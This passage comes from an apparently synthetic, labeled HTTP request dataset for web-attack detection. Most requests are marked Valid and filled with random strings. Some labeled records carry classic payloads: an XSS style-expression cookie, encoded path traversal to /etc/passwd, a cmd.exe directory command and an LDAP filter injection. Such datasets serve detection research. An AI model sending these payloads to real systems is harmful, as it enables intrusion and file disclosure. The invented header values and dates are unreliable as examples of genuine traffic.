Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 432 www.i7dte.html "w6tbf" "Sat, 14 Feb 04 01:47:29 UTC"
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43905
Start - Id: 21672
class: Valid
GET /5bZfZOu/4tHMea8p4mDRnB4xrI/lJMHGZiK@ljuoxvO@MX/m_OuQV9/a3nl6joEenqIs/eahfeij7VoatNeen/eRMWsVf0bBE-DDu/ta1aoiihheeql/ipqncth8ik4snriut/i5Sluett9UaligimS/aoi3swcieeIt3twnrt4p/yuJ3.gif?xbrnegoeslEnktr=2&rnhtshl7st=7arMx-XNg&n@rT1oK=tEY1G7m&iif=p%25h%3Bn%5Dcci&U5o.=aynuy&it5jbbdodbnt=i%3Deonullm%7Eihttpsodlaa&rroeaner32gcis8=rtyE&owmnendaTto=29637616&tt=hgb9ao%26css%2FM%27&ds0ri=dta&acceptnph-objectsystemZXvxterm6xra=iocesinput5&rksouom=5553 HTTP/1.1
Host: www.oarwtyod.st
Connection: close
Accept: application/*;q=0.0, application/*, video/*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: ss-e;q=0.1, 2Npst-sd, eemlh-dahppt;q=0.4
Cache-Control: no-transform
Client-ip: 8.140.139.237
Cookie: wqKzFFl=huton;devefyvlomtsYLt=eninipioeaAsteno
Cookie2: $Version="9"
Date: Sat, 22 Oct 05 16:16:24 GMT
ETag: W/"S6Gp@8799WoQeaOxtO"
Expect: tamabw6z=temuhm
From: hrhe@thdtgL.uk
If-Modified-Since: Sun, 09 Mar 08 08:27:58 UTC
If-Unmodified-Since: Thu, 21 Aug 08 07:23:15 GMT
If-Match: *
If-None-Match: "u-YB8fHcWlg0JkH"
If-Range: Thu, 08 Jan 09 22:21:10 CET
Max-Forwards: 8262
MIME-Version: 9.6
Pragma: u='euY'
Proxy-Authorization: naoa orne=tnlmssv
Authorization: kHenen TtbeCzcr=aieila
Range: 73394-4909,050042-,203-3
Referer: http://www.8les.fr/nnlmnstl/TihuSv/io7m/wJeeh.nsf
TE: chunked;q=0.4,deflate;q=0.5
Trailer: Expect
User-Agent: nhvbetagSt
UA-CPU: 68000
UA-Disp: 6270,1333,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5233x580
Via: hss8/3.2 www.o85g.htm, HTTP/8.3 125.168.112.180:48748, 9.6 185.191.246.157
Transfer-Encoding: compress
Upgrade: rez4na/9.8
Warning: 014 123.249.187.19 "ccuiedee" 
X-Forwarded-For: 153.189.235.245
X-Serial-Number: 3680166238
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21672
Start - Id: 14906
class: Valid
GET /tgiduoEcorseD/e.4o/eD2oIX-dSxub_DGqSjk/3ghavingpassthru-KzQI/mn-CJ/3U-SAqRc.whereSTOcpassthru/ie/sl/emTRtnscnhri/hD4yUO/eeQ/Ooiolt.png?psicC1cnBomrr=sBVEEbLg&ncBzevalP4=eazV-.xr&rgehwednrnerGim=ofa4c&teqs=atalrmorcA&eSeS12lntp1qn=o+Bsa0et%5BEa&SPin.s2window.open6FP=%7Ea&edetl=9514 HTTP/1.0
Host: 167.14.80.178
Connection: ihet
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: dp9gh='kemoGt'
Client-ip: 80.243.239.27
Cookie: lPX7home0dtldhd=20120;pot623hydu=4605719
Cookie2: $Version="488"
Date: Mon, 01 Aug 05 18:16:19 CET
ETag: "RFGfswz-cZFmM3r"
Expect: irjtg=mioo
From: rci1ha@regno3ir.ch
If-Modified-Since: Sun, 31 Oct 04 08:36:14 UTC
If-Unmodified-Since: Thu, 20 Sep 07 22:19:06 CET
If-Match: "-vsNtRsPJdjvGtwJl.La"
If-None-Match: *
If-Range: "F00YRF3Cw.oHRL_"
Max-Forwards: 9
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic aWVzYWc6NnhzNnlsb3M=
Authorization: 8arok qv5onc=oOsc
Range: 09234-
Referer: http://www.ueic9.uk/it8t09/2ipt7o.asmx
TE: chunked
Trailer: From
User-Agent: rdneuE/8.7.8.3.4
UA-CPU: StrongARM
UA-Disp: 8593,9918,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6967x560
Via: 0.8 225.65.218.13, FTP/8.9 www.iystef.jpeg
Transfer-Encoding: gzip
Upgrade: ed3tT/7.9, 3Ifeie/2.1, etw/3.8, thenvr/4.1
Warning: 225 184.210.143.62:77965 "ecfsd0heehezcle" "Sat, 24 Feb 07 14:16:26 UTC"
X-Forwarded-For: 123.153.218.172
X-Serial-Number: 580548431954980
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14906
Start - Id: 46736
class: XSS
GET /q_5_dbLOug5c/seplcsuzbnendiomuesw/thniKNg8QNBqnnQ/oGpdqcj4X82v/ro2tjweessrt4cxi/byKNPA._Loxp_samM8/bso/sC5S908WA5t6fvCui/6ewVKO9apassthruEx/rWBiwocmvm5ox2p.mdb?7Dnode.IfPExYc=Yntt9t%3Fhtacces%7EL%3Cqq6dh%24oi&esygahdtuS=hirnestsecswre&txe2hpduAmsclrp=oo&6PY-OFRF%uw-=234 HTTP/1.1
Host: 57.26.11.64:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aXm-psam;q=0.8, 4oa-or
Cache-Control: no-store
Client-ip: 214.247.198.129
Cookie: enlfahhzot=123;adminW-0gZZ=s8    style=left:expression(alert(eflps.a));mN2hM=34
Cookie2: $Version="78"
Date: Fri, 20 Jan 06 12:33:33 GMT
ETag: "4@ok28_Tv@xVUoBPU."
Expect: 100-continue
From: Ertclen@yaez.com
If-Modified-Since: Sun, 22 Oct 06 24:04:07 UTC
If-Unmodified-Since: Sat, 15 May 04 13:43:37 GMT
If-Match: *
If-None-Match: *
If-Range: "uNZdxvunDQDxD1_Us"
Max-Forwards: 790
MIME-Version: 1.1
Pragma: tdgIesn='Eaet'
Proxy-Authorization: dNtwcd 6dptZm=tetko
Authorization: Basic Q3ZlNzRhZDp0ZWVmeHVucw==
Range: 374-98,49643-6065
Referer: http://www.9isA.be/so49eo3/00fon/wecr3chw/iensa/nsflfo.cfm
TE: gzip
Trailer: Accept
User-Agent: osrtjsueyoli
UA-CPU: StrongARM
UA-OS: Win98
UA-Color: color32
UA-Pixels: 318x240
Via: 7.6 www.xrQyh1t.htm, FTP/6.3 201.120.87.115, 6.1 www.rT2tn.jpeg
Transfer-Encoding: identity
Upgrade: nasb/8.9, sn6a/0.6, vss/6.2
Warning: 010 www.a8sa.htm "nmhkcmhseac2rng" "Wed, 04 Jun 08 06:13:20 UTC"
X-Forwarded-For: 235.233.246.128
X-Serial-Number: 293931197401381
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46736
Start - Id: 46222
class: PathTransversal
GET /werm67rlm1j/eels3hwdrsll/eudkeh9h7shE.mdb?ntnsm=ScOimsioVppyau&hhomeG9xRoya.gr=rrrrezOTEozeyeoese&hrB5eaoor=96taeUteah&he9wwo=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&mspbvN7=40205&oX-KTxnph-exec5=n&ohnsoeosdbo=ja5Qf65uwbT&6yae=348&wc=+ HTTP/1.0
Host: www.zNitgqd.be:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.5, gzip;q=0.3, compress
Accept-Language: SfIfsma-nO
Cache-Control: no-transform
Client-ip: 184.19.40.250
Cookie: LVwinntdnAK=1453811640
Cookie2: $Version="6"
Date: Tue, 11 Oct 05 14:27:53 CET
ETag: W/"T3S71sqPNBzZRCk"
Expect: tiesfh=tc5ceo;tebom
From: xeibsrh@cIoaz0o30a.fr
If-Modified-Since: Mon, 24 Jan 05 03:06:21 UTC
If-Unmodified-Since: Sat, 02 Dec 06 20:45:22 GMT
If-Match: "oR0d0D7fGL.DyZy"
If-None-Match: *
If-Range: Fri, 16 Nov 07 24:52:34 CET
Max-Forwards: 8487
MIME-Version: 5.5
Pragma: tinn2l=e
Proxy-Authorization: nuit ePlSnli=Ews6alar
Authorization: Basic b2VpbzpIcGhyZQ==
Range: 3-320
Referer: /iudvaSm.jsp
TE: chunked,gzip
Trailer: Accept-Language
User-Agent: Mozilla/8.9 (Windows; U; Win98 3.8; nn-yr; rv:4.6.5) Gecko/24658049
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6581x3968
Via: HTTP/6.2 37.139.61.164
Transfer-Encoding: eeesu; aAMy=6hnpsn5
Upgrade: esjpot/5.8, eni/8.5, tytox8/4.9
Warning: 677 234.22.108.123:360 "tgee6rvkuora" "Mon, 22 Jun 09 20:41:00 CET"
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46222
Start - Id: 18882
class: Valid
GET /awhjC4bb_kyX7/nabkse5kfdb6diuoree/DquQX__nrexecv/cs/rpin4dorh/Oodrt2kbti5/Jtb/lZi.9Bc@ZM02vpasswd/dtra.html? HTTP/1.1
Host: 226.138.44.139:80
Connection: close
Accept: audio/*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: vii7tMfi-yssr5td;q=0.0, nd-a6, eg-elro;q=0.1
Cache-Control: only-if-cached
Client-ip: 100.195.49.71
Cookie: aspe5=26;JWgsGE=stdwy
Cookie2: $Version="9"
Date: Fri, 08 Feb 08 11:47:31 UTC
ETag: W/"pocZuN7RKbjXwg6Osjsu"
Expect: fheib7
From: nscrNius@xktgm8net.st
If-Modified-Since: Sun, 10 Jan 10 02:00:04 GMT
If-Unmodified-Since: Sat, 05 Apr 08 07:45:30 CET
If-Match: *
If-None-Match: "oR5P9RkOIGa_DRiot"
If-Range: Fri, 13 Jun 08 07:58:29 UTC
Max-Forwards: 9
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: rosn fFgnmro=asazA
Range: -47,36391-88404,16-
Referer: /nU4o/rtbeau/7chest/ztalsq/a1ien.mpg
TE: gzip
Trailer: Cache-Control
User-Agent: Mozilla/3.7 (X11; U; Unix 5.9; am-ot; rv:4.4.4) Gecko/53554333
UA-CPU: StrongARM
UA-Disp: 708,1125,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 592x5506
Via: 3.4 www.mrele.jpeg, nutelo/2.4 www.msE3.js
Transfer-Encoding: compress
Upgrade: nash0s/1.5, Xiiie/7.6
Warning: 798 www.cettD.jpeg "ieNr0" 
X-Forwarded-For: 56.146.49.3
X-Serial-Number: 40451880140353665306
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18882
Start - Id: 24542
class: Valid
GET /rVRv6lkXItKY/Q6J-3qiU@2ls_8_/tnasaelbl/ou9/yd/oOWDcTH_sp_ezbKTtbRB/8PEn.63ZIv/hQ_/psntl.js? HTTP/1.1
Host: www.Mrel3al.net
Connection: stnQldy
Accept: video/*;q=0.7, text/xml, video/mpeg;q=0.5
Accept-Charset: x-mac-arabic, x-mac-korean, utf-8, big5;q=0.7, windows-1257
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 214.196.246.18
Cookie: hfnn=22;roi=265166
Cookie2: $Version="2"
Date: Mon, 05 Jul 04 15:18:04 GMT
ETag: W/"iB.OzctuyqalSvS"
Expect: 100-continue
From: leyen9ll@dgyc.uk
If-Modified-Since: Tue, 24 Feb 09 13:55:38 UTC
If-Unmodified-Since: Sun, 06 Feb 05 09:35:32 GMT
If-Match: *
If-None-Match: "9sKQbchC3fc0XwJuudh"
If-Range: Thu, 28 Dec 06 13:28:44 UTC
Max-Forwards: 409
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: oyTb n3auus1d=esdje3nn
Authorization: Basic d2lvc2V0Om5yZXps
Range: -001651,-8
Referer: http://www.dcev4e.uk/nttheep/epeodsga/hole5got/nstu.gif
TE: trailers,chunked;q=0.2
Trailer: If-Modified-Since
User-Agent: mpaLtj (ftV_ZJ)
UA-CPU: Sparc
UA-Disp: 1408,616,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 303x667
Via: 8.5 152.63.60.52:7992
Transfer-Encoding: gzip
Upgrade: prsuot/9.5, stt/6.8
Warning: 900 74.109.202.46:6 "oanoeaj2nll" "Sat, 13 Jan 07 24:32:28 GMT"
X-Forwarded-For: 172.69.172.228
X-Serial-Number: 185732331097779
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24542
Start - Id: 36486
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 176.151.42.113
Connection: close
Accept: */*
Accept-Charset: isiri-3342;q=0.0, gb2312;q=0.4, x-mac-hebrew;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: min-fresh=723
Client-ip: 7.170.218.4
Cookie: fttn4ar7aam=smt+>;o1nploqineho=11;e8aserfzOhtcaei=t l1eilikeqoixwe;namhe=00;hsoeorvnkeaEndo=gway9ru;KSrLGO=q
Cookie2: $Version="984"
Date: Mon, 03 Dec 07 24:19:00 CET
ETag: "EEjfH1qoZefe@m2kmR"
Expect: 100-continue
From: n8us@72HjX.ch
If-Modified-Since: Thu, 15 Feb 07 05:51:15 UTC
If-Unmodified-Since: Tue, 17 Jun 08 13:42:44 GMT
If-Match: "BruOo.VZdGlpVJPoS2Y"
If-None-Match: "WV99r78SvCx-jsQKD"
If-Range: Thu, 17 Aug 06 17:47:41 UTC
Max-Forwards: 23
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: Digest cnonce="eeedo"
Range: 998505-,-0540,815-
Referer: http://www.cgt8ftw.net/sdltsa.php4
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: cifTaey (cXxJxGYqvy; akCpaNHVF)
UA-CPU: Sparc
UA-Disp: 900,140,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 512x1298
Via: ebfar/1.7 www.neomno.tiff, 0.6 146.116.206.1, 1.0 179.194.13.225
Transfer-Encoding: oeEjm
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 5785430371432590
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36486
Start - Id: 30011
class: Valid
GET /gDb3aeqicerdaehpa1yn/tohe2oydjtleNsee/4h7hlnhesoeLfq3fauj/5elbI2qu/iA/lpE/6HPg/1lW7jzHXFz083__PblaU/ttEP/uetpTan/76IX/THUinput.swf? HTTP/1.0
Host: 69.157.213.90:29174
Connection: wnitamt
Accept: application/zip;q=0.7, text/*, application/*;q=0.1
Accept-Charset: x-mac-turkish;q=0.9, big5;q=0.4, hz-gb-2312;q=0.5, us-ascii, iso-2022-kr;q=0.4
Accept-Encoding: 
Accept-Language: eZqm2a3-dtt;q=0.2
Cache-Control: no-store
Client-ip: 142.42.77.41
Cookie: een=s6R;Oeadgi=4634646;etEnvcoa=echosa-nok;z1t=3;rrQt2=7437073;ldrDozi7Eatert=34
Cookie2: $Version="5"
Date: Thu, 25 May 06 01:53:57 CET
ETag: "YtZnwZotDAgzz2LAh@p"
Expect: yovisw6q=losnss
From: aeeNsEvt@wbsohnw.st
If-Modified-Since: Mon, 17 Oct 05 09:36:19 UTC
If-Unmodified-Since: Thu, 10 May 07 03:19:26 GMT
If-Match: "J4TEjYb.1-KPG7dXn"
If-None-Match: *
If-Range: Fri, 09 Jan 04 04:30:02 CET
Max-Forwards: 90
MIME-Version: 4.2
Pragma: h4rult9=hTuEb
Proxy-Authorization: NTLM dGVkbWNkczNhMHdjeW5uY29lbnV3a3NWaW84ZXRpNWhCeWk=
Authorization: kRi4t gaoNmp=rgzmtsao
Range: 407657-,-1719
Referer: /7eaereO/tetn/sp8De/tnnm6/eslIuevp.asp
TE: gzip;q=0.5
Trailer: Accept-Encoding
User-Agent: rtiodtjo/8.7.8
UA-CPU: 68000
UA-Disp: 644,8528,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5067x616
Via: 5.4 135.11.48.166
Transfer-Encoding: identity
Upgrade: zco8u/3.9, 7ddF/2.0, P5tob/6.7
Warning: 929 111.138.94.34 "fYos2dhjediq09q9ela" "Sun, 20 Sep 09 07:36:42 GMT"
X-Forwarded-For: 23.247.167.67
X-Serial-Number: 2857393
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30011
Start - Id: 5482
class: Valid
POST /eeimuhhssiihaEht/nT/disfw8Tbvcsi/Q2gP/d6cmq/vuRilettsibe7noe/l2RnupIe7/h4sIs0EDHuwt/9httpS3edocumentWH6RJmv2/2rWa/Gkhavingservices@ajF@GQIJV/anfgaeU.aspx? HTTP/1.1
Content-Length: 82
Content-Language: H,atNti
Content-Encoding: compress
Content-Location: http://www.seimpM.gov/joh5m.ace
Content-MD5: ME9NZG9ic3lodnJkNVRvdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 07 Nov 06 24:50:25 GMT
Last-Modified: Sat, 28 Oct 06 04:55:54 GMT
Host: www.odemt.biz:80
Connection: Podyb0st
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 55.210.233.217
Cookie: suaei=dexd3o0c0ro;sadRcrtOpyhMir=NbiNltr;zstw1riwnu=poo;meeshchaobyn=anprocessing-instructionos;i8dii4lt=r7aqeDXzSwwd;dTiclAr5ZrutoOs=8193555324
Cookie2: $Version="1"
Date: Thu, 16 Aug 07 09:00:43 UTC
ETag: W/"CuZ@7VV1doTh2wOJdDh"
Expect: dm7lh
From: a2re@neunel.uk
If-Modified-Since: Thu, 24 May 07 07:15:59 UTC
If-Unmodified-Since: Thu, 19 Jan 06 18:47:53 GMT
If-Match: "LYJH9yB@jgRH1Sccjqo"
If-None-Match: *
If-Range: Thu, 17 Mar 05 13:30:24 GMT
Max-Forwards: 7442
MIME-Version: 6.9
Pragma: lctsd=sootf
Proxy-Authorization: Digest nonce
Authorization: NTLM YWVoZXc5cmk5N3JlUmFvZmVuZWxyNXBkaWV1YXJjb3h0b2p5OXJ0YXJqYW4=
Range: -1,49-10
Referer: http://www.oEt5iems.ch/Rt3idtne.shtml
TE: trailers
Trailer: Max-Forwards
User-Agent: Q1rtsnlafmsnsnt
UA-CPU: StrongARM
UA-Disp: 4823,2898,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 2642x571
Via: 1.4 www.dw8nyso.js, 2.8 www.1Enfttas.jpeg:117, 1.5 www.etePe0.jpg:15561
Transfer-Encoding: compress
Upgrade: aowete/2.3, cLo43/0.3
Warning: 081 www.m8rn1rmo.shtml:31303 "6h7tteywuheldre" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 56905023798190
----: ---------------------
~~~~~: ~~~~~~~~~~~

_AyNEAtelnetCS=1511&kptnNluhaofs4t=27612928&enhi5rTpbuahuso=8399&t63ft=d&cc=196335

End - Id: 5482
Start - Id: 30258
class: Valid
GET /Xam/paomyfla/tOXw/iWyy/nSgQHK6@F/eeihIdaqltsu.nsf?m.jfN=59222&lTaibajaO8zbz=1yeval&onnalsenu=5810866&pdOHtdofK42=trQi&al9h=Hdu&J.yZ=674932&ttirrtshaj0ieq=01&liipiyqisceUgn=%3An+r HTTP/1.1
Host: www.sTemn.de
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: cp-950, windows-1253, windows-1258
Accept-Encoding: deflate, identity, gzip;q=0.1, compress
Accept-Language: 0h9bs-h, wxe-t0ernrh, h-dneso;q=0.6
Cache-Control: max-stale
Client-ip: 0.206.225.217
Cookie: 1oo=rj oNaeStro9eiframeet]var;rD2iizqd8di=BiTaifOirnnoe978m
Cookie2: $Version="71"
Date: Mon, 16 Jun 08 14:23:17 UTC
ETag: "q4IL6nQT8JnrD.QqB"
Expect: 8aWO=eyUest2
From: thhe@arsfxa.biz
If-Modified-Since: Sun, 28 Dec 08 10:55:56 UTC
If-Unmodified-Since: Wed, 13 Feb 08 08:40:15 UTC
If-Match: "xhUf2Mj3WZkhwPa"
If-None-Match: *
If-Range: Thu, 21 Jan 10 05:33:12 UTC
Max-Forwards: 2302
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest opaque="yJyn"
Range: -8
Referer: http://www.errs.org/argmu4e.pdf
TE: trailers,chunked;q=0.0,chunked
Trailer: Max-Forwards
User-Agent: secn (b6x803A; xvGWTa)
UA-CPU: StrongARM
UA-Disp: 790,434,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2607x1931
Via: 2.8 www.hScs.png, 5.8 www.Iitoneoh.png, muhi/3.4 www.atpic.html
Transfer-Encoding: compress
Upgrade: 92ti/2.3, helqbf/3.9, e7crte/0.3, xhgFid/0.0, a5e/8.9
Warning: 129 www.4od57o.jpeg "yOsa6fhl9hr" "Tue, 17 Jul 07 20:05:50 UTC"
X-Forwarded-For: 145.131.221.116
X-Serial-Number: 605112430
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30258
Start - Id: 1177
class: Valid
GET /ruyDt7-r.W_E/x9EWL8YOB6a@A9eV3CwF/e6C696w._oO4eieE.png?dpa=odetn&pa7tEreeqhbn8w=38483&env=45&CgdeNftfoD=lZxLZ&ei0dteo=19135258&znqeiriisveo4lo=i1lps&lusw=openlikette HTTP/1.1
Host: www.ehvwhNwih.fr:509
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 146.252.162.213
Cookie: 8ewaeizaei=re0 Rtndmnua;sidedonizis=eAJL77oeD;kRV5-F3B=56;san=onwnreanla
Cookie2: $Version="99"
Date: Sat, 08 Dec 07 01:12:38 UTC
ETag: "PDK5R1bFXa2W3huBM"
Expect: 100-continue
From: lotyd@3e47eeHm.it
If-Modified-Since: Tue, 29 Nov 05 09:27:54 GMT
If-Unmodified-Since: Sun, 09 Nov 08 09:41:21 CET
If-Match: "yL7aQGb91MVG_eWyFg"
If-None-Match: *
If-Range: Sun, 25 Apr 10 19:23:05 GMT
Max-Forwards: 2106
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: NTLM dDg3bmlmVGxidm5BdDFldm90ZUZhb3RlbHJhRGhpYTlrcXJlV2hkaGUzeW5ldA==
Authorization: trlid titjtmo=txrenI
Range: -35236,31901-084
Referer: /ealssLhe/stro9t.png
TE: trailers,deflate;q=0.6
Trailer: Via
User-Agent: Mozilla/6.6 (X11; U; Unix 0.3; Px-ez; rv:6.8.6) Gecko/18142904
UA-CPU: StrongARM
UA-Disp: 3549,296,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5650x6286
Via: kneo/6.4 www.x7pnfwo.css
Transfer-Encoding: identity
Upgrade: kral/6.2, yml/0.4, en5h/1.2
Warning: 664 236.240.179.234 "ldnr" 
X-Forwarded-For: 174.219.186.109
X-Serial-Number: 83434025
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 1177
Start - Id: 24658
class: Valid
GET /aXcTmk@G99D-qh2YMu.tiff? HTTP/1.1
Host: www.4furfyen0.it
Connection: keep-alive
Accept: video/quicktime;q=0.8, video/quicktime, application/x-tar;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: tlhaa-TkjeSg;q=0.7, O-nhitc
Cache-Control: no-store
Client-ip: 252.174.24.134
Cookie: sytEtbuoeas=afs 3caiel;eym8tert=11671;nt2=vuHuo;eeeiyrbouGa=87491012
Cookie2: $Version="3"
Date: Tue, 11 Jan 05 05:05:07 CET
ETag: "i.7Yq1YoQK.eJPxQ_v"
Expect: 100-continue
From: dtiJev@chlmiutOj.fr
If-Modified-Since: Sun, 11 Nov 07 03:32:43 CET
If-Unmodified-Since: Tue, 13 Mar 07 18:05:50 CET
If-Match: *
If-None-Match: "Rb49Ig_wj9bEngNLO"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.5
Pragma: qlt='or9s'
Proxy-Authorization: Asws oa5d=buerH
Authorization: Digest uri=http://www.gathnS.gov/ai2dt/ea6nOib/seGe/jiiaept.css
Range: 7216-
Referer: http://www.vtd3z9ar.fr/ntoSoe.tar.gz
TE: gzip;q=0.0,chunked;q=0.6
Trailer: Expect
User-Agent: mtinllsowerhStXlmt2
UA-CPU: PowerPC
UA-Disp: 986,554,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 578x008
Via: 0.8 www.idismyd.htm:29575, 0.2 44.126.178.13, HTTP/9.8 170.53.162.183
Transfer-Encoding: gzip
Upgrade: gh8d/6.0, ersee/3.2
Warning: 630 240.228.130.93 "ldhdroewpruS9hem" 
X-Forwarded-For: 97.48.167.87
X-Serial-Number: 56029803010715
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24658
Start - Id: 38206
class: LdapInjection
GET /eot/nPMBI5OyqlJDa2b1cck/rmlh6ee9iiIey0rmI/pmaInEtgg/c6Si1E43vKRZctMHIb/oVVueMSPbBcnZgh6FY/tBsNh/tsts2/GNmlQEypnjkL@aP.png?syelejc4Urg=spttnnweoatF&4r=m8Qj&htpassUHbodyRW=6882970270&6elm=evaJy-&ohAiin=48013896&cpal=710%29%28%26%28objectClass%3Dcwr%29%28%7C%28sn++++%3D++++e9sg%29%28cn%3DCssm+++J*%29%29&epsEdqX1b_usr=3 HTTP/1.0
Host: 202.55.41.155
Connection: close
Accept: text/*;q=0.0, audio/x-wav;q=0.5
Accept-Charset: windows-1251
Accept-Encoding: identity, deflate;q=0.3, compress;q=0.1, gzip;q=0.7, deflate;q=0.8
Accept-Language: 6x-ht7sa;q=0.9, d7tldtu-ai
Cache-Control: no-store
Client-ip: 9.211.101.123
Cookie: ceBoniYt=9;EdtOdenbehwyil=p;SNmZteTtuse=>o?;IlsS=438918581;TXvB_q5ZKqGV=te
Cookie2: $Version="98"
Date: Thu, 24 Aug 06 19:18:45 CET
ETag: "BZao1zoim4tVZHUa8"
Expect: efooed
From: hnrpa@Dtsdlni.be
If-Modified-Since: Sat, 14 Feb 09 13:01:18 UTC
If-Unmodified-Since: Fri, 06 Jul 07 20:26:44 UTC
If-Match: "UbZneqKfi8XP9Ar6"
If-None-Match: *
If-Range: Wed, 18 Jan 06 11:45:28 GMT
Max-Forwards: 67
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: tnEjr B7bt5=zaeTe
Authorization: Basic c3NzaWk6ZU5kZQ==
Range: 143609-2,-687,75-
Referer: /abpn/osHdt/imcd/atyn6sil.png
TE: trailers
Trailer: Warning
User-Agent: Mozilla/5.1 (X11; U; Solaris 3.8; hs-3e; rv:3.3.0) Gecko/73515751
UA-CPU: StrongARM
UA-Disp: 843,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 321x2267
Via: 8.1 123.177.211.141, 9.7 142.211.220.112:3, FTP/0.1 169.49.77.134
Transfer-Encoding: gzip
Upgrade: mrrUlT/4.8, 7edu/8.3
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 38206
Start - Id: 31327
class: Valid
GET /htth7vrdtEisrJxi/tLhdogmlnh4at/testgzawfAvswokaqe/nTAOIXmurL6w4@91JA/s0nf34soenoscecomgbe/mBeDzl/eyeOoAqrnri/a_Th5PXt.jsp?olvLp03olheo=rsrdqm8dstcoremrbe&ait6meh=in%3E+d HTTP/1.1
Host: www.T12eeiin.biz:776
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: eoaful-EgU;q=0.4, 5O-e5b6ed, gwiiermh-Hehuhwc9;q=0.1, doa-o0O;q=0.0, rsqnk-es
Cache-Control: max-stale
Client-ip: 243.156.176.3
Cookie: zsp8tntiscvoi=nPortgniwtOmtsll9exec;Best=ncvuithmo7;tiit8oErE=le4m
Cookie2: $Version="030"
Date: Sun, 20 Aug 06 06:05:17 GMT
ETag: W/"itaj-LM3X92JM4r"
Expect: 100-continue
From: rgc6ndo@etox.net
If-Modified-Since: Sat, 28 Aug 04 06:42:33 GMT
If-Unmodified-Since: Wed, 19 May 04 23:38:11 UTC
If-Match: *
If-None-Match: "-GVqkkDsA0cLo37DWTPg"
If-Range: *
Max-Forwards: 16
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Basic bTZyMXg6bXM3aQ==
Authorization: ntus qrrx=1TiSes
Range: 826881-
Referer: http://phnie.de/AatqedoA/oAihnd/fjlMir2/eSOt07o4/i9upqay.cgi
TE: gzip;q=0.1,trailers,chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.8 (Machintosh; U; Mac OS X 2.5; hh-ie; rv:3.9.4) Gecko/95660978
